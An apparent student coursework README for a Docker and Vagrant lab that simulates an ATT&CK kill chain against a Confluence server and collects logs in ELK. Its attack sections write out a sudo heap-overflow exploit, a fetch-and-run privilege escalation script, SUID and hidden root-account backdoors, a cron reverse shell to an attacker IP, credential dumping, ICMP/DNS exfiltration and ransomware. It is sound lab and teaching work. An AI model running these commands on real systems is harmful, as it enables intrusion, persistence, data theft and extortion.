- To plan and implement a attack simulation utilizing
ATT&CK tactics
,techniques
- To integrate the usage of
Vagrant Scripts
andDocker Containers
- To perform log
collection
,cleaning
andvisualisation
with the use of theELK
stack
2000941
- Ian Peh Shun Wei2001174
- Kevin Pook Yuan Kai2001209
- Lim Jin Tao Benjamin2001267
- Foong Jun Hui2001558
- Jeremy Jevon Chow Zi You2001689
- Cham Zheng Han Donovan
- Initial Access -
Exploit Public-Facing Application
- Privilege Escalation -
Exploit Buffer Overflow
- Persistence -
Exploit SUID Binary File
- Credential Access -
Unsecured Credentials
- Collection & Exfiltration -
Exfiltration via ICMP and DNS
- Impact -
Ransomware
Vagrant
- https://www.vagrantup.com/downloadsDocker Engine
- https://www.docker.com/- If using WSL2
- Create file
.wslconfig
inC:\Users\user
- Edit and add the following line:
- Create file
[wsl2]
kernelCommandLine = "sysctl.vm.max_map_count=262144"
- Part 1 - Spinning Up The Infrastructure
- Part 2 - Logs, Dashboards and Services
- Part 3 - Attack Vector and Exploits
- Documentation
-
Ensure Docker Engine is running
-
From within project folder
HOST-MACHINE@HOST $ vagrant up
Expected output
HOST-MACHINE@HOST $ vagrant up Bringing machine 'elk' up with 'docker' provider... Bringing machine 'kali' up with 'docker' provider... Bringing machine 'postgres' up with 'docker' provider... Bringing machine 'confluence' up with 'docker' provider... ... ...
HOST-MACHINE@HOST $ docker container ls CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES ... postgres:14 "docker-entrypoint.s…" .. minutes ago Up xx minutes 0.0.0.0:5432->5432/tcp postgres ... kevinpook/confluence-7.13.0 "/bin/sh -c '/usr/sb…" .. minutes ago Up xx minutes 127.0.0.1:2201->22/tcp, 0.0.0.0:80->8090/tcp confluence ... sebp/elk "/usr/local/bin/star…" .. minutes ago Up xx minutes 0.0.0.0:5044->5044/tcp, 0.0.0.0:5601->5601/tcp, 0.0.0.0:9200->9200/tcp, 0.0.0.0:9600->9600/tcp, 9300/tcp elk ... tknerr/baseimage-ubuntu:18.04 "/bin/sh -c '/usr/sb…" .. minutes ago Up xx minutes 127.0.0.1:2222->22/tcp kali
- Configure imported ELK Dashboard
HOST-MACHINE@HOST $ vagrant docker-exec elk -- cp /vagrant/config/dashboard/3204_export.ndjson /home
HOST-MACHINE@HOST $ vagrant docker-exec elk -- curl -X POST "http://127.0.0.1:5601/api/saved_objects/_import?createNewCopies=true" -H "kbn-xsrf: true" --form file=@/home/3204_export.ndjson
If running on WSL2, note that you need to configure your reinstall your WSL2 kernel to enable logging for the containers spun up by docker. This is because the standard WSL2 kernel comes with the options for CONFIG_AUDIT
and CONFIG_NETFILTER_XT_TARGET_AUDIT
disabled. The reason is roughly due to the lack of support for SElinux on WSL2, which made this an unnecessary feature. To ensure that logging functionalities on the Confluence machine through the auditd
package can work, the kernel must be rebuilt with the asforementioned options enabled.
The reference guide is here. The compiled kernel is located in the project root: bzImage
. Just add the bzImage
path to the .wslconfig
located in the user home directory (C:\Users\User\.wslconfig
) => kernel=<path to bzImage>
. Restart WSL2 after that and run vagrant up
to check if the configuration is successful. Note that this configuration is only tested on WSL2 Ubuntu-20.04
image.
- Create the file
C:\Users\User\.wslconfig
- Add this code (NOTE: make sure to use
\\
to escape the\
):
[wsl2]
kernel=C:\\Users\\myuser\\...\\3204_coursework_1\\bzImage
- Ensure that docker is NOT running
- Open command prompt and run
wsl --shutdown
- The next time you open WSL2 you should be able to see the output as follows
$ uname -a
Linux MYMACHINE 5.15.68.1-microsoft-standard-WSL2-3204+ #1 SMP Tue Oct 25 10:13:28 +08 2022 x86_64 x86_64 x86_64 GNU/Linux
$ zfgrep AUDIT /proc/config.gz
CONFIG_AUDIT=y
CONFIG_HAVE_ARCH_AUDITSYSCALL=y
CONFIG_AUDITSYSCALL=y
CONFIG_AUDIT_ARCH=y
# CONFIG_KVM_MMU_AUDIT is not set
CONFIG_NETFILTER_XT_TARGET_AUDIT=y
# Get the status of the current vagrant machines
HOST-MACHINE@HOST $ vagrant status
# Delete and stop
HOST-MACHINE@HOST $ vagrant destroy
# Stop only
HOST-MACHINE@HOST $ vagrant halt
- Simulated Network -
10.0.0.3
- Testing and User Access -
http://127.0.0.1:80
- Simulated Network -
10.0.0.2
- User Access -
http://127.0.0.1:5601
- Browse to
http://127.0.0.1:5601/app/dashboards
to view the log dashboards. (e.g [Packetbeat] Overview ECS) - Exported data can be imported by placing them in
config/dashboard
and renaming them to3204_export.ndjson
The simulated attacker that is used to perform the relevant MITRE ATT&CK techniques can be accessed by utilizing the Attacker/Kali Docker container
HOST-MACHINE@HOST $ docker exec -it kali /bin/bash
The process of the attacks can be automated by adding the commands to be executed in the host machine into a bash script. The script is passed into the Vagrantfile with the run: "never"
parameter, which ensures that it does not run during the normal setup process. To manually activate the individual phases of the attack, run the following command:
HOST-MACHINE@HOST $ vagrant provision --provision-with <configured attack>
Available configured attacks: initialaccess
privesc
persistence
credentialaccess
exfil
ransom
HOST-MACHINE@HOST $ vagrant provision --provision-with initialaccess
==> kali: Running provisioner: initialaccess (shell)...
...
kali: confluence@confluence:/opt/atlassian/confluence/bin$ exit
HOST-MACHINE@HOST $
HOST-MACHINE@HOST $ docker exec -it kali /bin/bash
root@kali # cd /tmp/1_InitialAccess
root@kali # bash runme.sh
confluence@confluence:/opt/atlassian/confluence/bin $
https://github.com/CptGibbon/CVE-2021-3156
- Heap-Based Buffer Overflow in Sudo also known as Baron Samedit
- Vulnerability exploitation allows low privileged users to gain root privileges
- Privilege escalation via "sudoedit -s" and a command-line argument that ends with a single backslash character
root@confluence:/# su confluence
confluence@confluence:/$ cd /vagrant/attack/2_PrivilegeEscalation
confluence@confluence:/vagrant/attack/2_PrivilegeEscalation$ ./demo_1_cve.sh
root@confluence:/tmp/pe/CVE-2021-3156#
The python package installer (PIP) can be used by the confluence user to gain sudo access by running an exploit script that abuses over-privilege.
root@confluence:/# su confluence
confluence@confluence:/$ cd /tmp/pe
confluence@confluence:/tmp/pe$ wget https://gist.githubusercontent.com/kevinnivekkevin/a9c929a632de3ff4c3b03fbbd247c6f2/raw/e740c5d73ff0a8b17ba3b54c2bfebfe102f3f197/sudoers_pe.sh
confluence@confluence:/tmp/pe$ chmod +x sudoers_pe.sh
confluence@confluence:/tmp/pe$ ./sudoers_pe.sh
root@confluence:/#
HOST-MACHINE@HOST $ vagrant provision --provision-with privesc
HOST-MACHINE@HOST $ vagrant provision --provision-with sudoerspe
- After gaining root access via privilege escalation, create suid binary to allow anyone to execute the file.
- Allows attacker to regain root privileges from low privileged user account.
root@confluence:/# cd /tmp
root@confluence:/tmp# cp /vagrant/attack/persistence/binarysuid /tmp/suid.c
root@confluence:/tmp# gcc suid.c -o suid
root@confluence:/tmp# chmod 7111 suid
root@confluence:/tmp# rm suid.c
confluence@confluence:/tmp$ ./suid
whoami
root
- After gaining root access via privilege escalation, create root privileges account.
- Allows attacker to regain root privileges by accessing the account.
root@confluence:/tmp# useradd -ou 0 -g 0 systemd
root@confluence:/tmp# chpasswd <<<"systemd:systemd"
confluence@confluence:/tmp$ echo "import pty; pty.spawn('/bin/bash')" >/tmp/shell.py
confluence@confluence:/tmp$ python /tmp/shell.py
bash: /root/.bashrc: Permission denied
confluence@confluence:/tmp$ su systemd
Password: systemd
# whoami
whoami
root
- After gaining root access via privilege escalation, create crontab to run /bin/bash every 1 min on port 4242.
- Allows attacker to regain root privileges by listening to port 4242.
root@confluence:/tmp# (crontab -l ; echo "* * * * * sleep 1 && /bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.0.5/4242 0>&1'")|crontab 2> /dev/null
root@kali:/# nc -nvlp 4242
listening on [any] 4242 ...
connect to [10.0.0.5] from (UNKNOWN) [10.0.0.3] 35094
bash: cannot set terminal process group (23962): Inappropriate ioctl for device
bash: no job control in this shell
root@confluence:~# whoami
root
HOST-MACHINE@HOST $ vagrant provision --provision-with persistence
DumpsterDiver is a tool that is used to detect any hardcoded secrets like keys or passwords.
LaZagne is an application that is used to retrieve passwords stored on a local computer.
linPEAS is a script that searches for possible paths to escalate privileges on Linux. Its functionalities include searching for possible passwords inside all the accessible files of the system.
HOST-MACHINE@HOST $ vagrant provision --provision-with credentialaccess
- Output from the tools used are stored at
/tmp/exfiltrate/credentialAccess
https://github.com/ariary/QueenSono
https://github.com/m57/dnsteal
- Collected files are tar-ed from the Confluence server sent to the attacker server via ICMP and DNS
- All files that are to be exfiltrated can be placed at
/tmp/exfiltrate
on the Confluence server - Files received by the attacker can be found at
/tmp/qs/
(ICMP) and/tmp/dnsteal/
(DNS) - Data is exfiltrated to the attacker at X minute intervals (currently set to 1).
HOST-MACHINE@HOST $ vagrant provision --provision-with exfil
- Run
keygen.py
to generate the2048-bit
RSA public and private keys used for the encryption process. - How the ransomware program works:
- Encryption done in
PKCS#1 OAEP
(RSAES-OAEP
): Asymmetric cipher based on RSA and OAEP padding. - Folders passed in as input to the
cryptic
(ransomware executable) - Folders will be recursively traversed to find files to encrypt.
- All files found will be encrypted with the public key.
- All encrypted files will have a new extension
.r4ns0m3
.
- Encryption done in
- After the ransomware has completed running, the original home page for the Confluence will be replaced with a defaced home page located at
attack/impact/#.vm
HOST-MACHINE@HOST $ vagrant provision --provision-with ransom